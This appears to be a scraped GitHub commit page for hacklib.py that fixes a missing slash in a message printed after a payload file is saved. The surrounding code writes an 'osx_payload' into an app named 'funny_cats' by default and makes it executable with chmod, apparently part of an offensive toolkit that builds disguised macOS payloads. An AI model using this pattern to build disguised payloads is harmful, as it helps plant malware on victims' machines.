We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
1 parent 4b09fd5 commit 1aaf1a4Copy full SHA for 1aaf1a4
1 file changed
hacklib.py
@@ -69,7 +69,7 @@ def create(self, IP, port, OS, appname = 'funny_cats'):
69
f.write(self.osx_payload)
70
import subprocess
71
subprocess.Popen(['chmod', '755', payload_path])
72
- print 'Payload saved to ' + os.getcwd() + appname + '.app'
+ print 'Payload saved to ' + os.getcwd() + '/' + appname + '.app'
73
74
class Server(object):
75
0 commit comments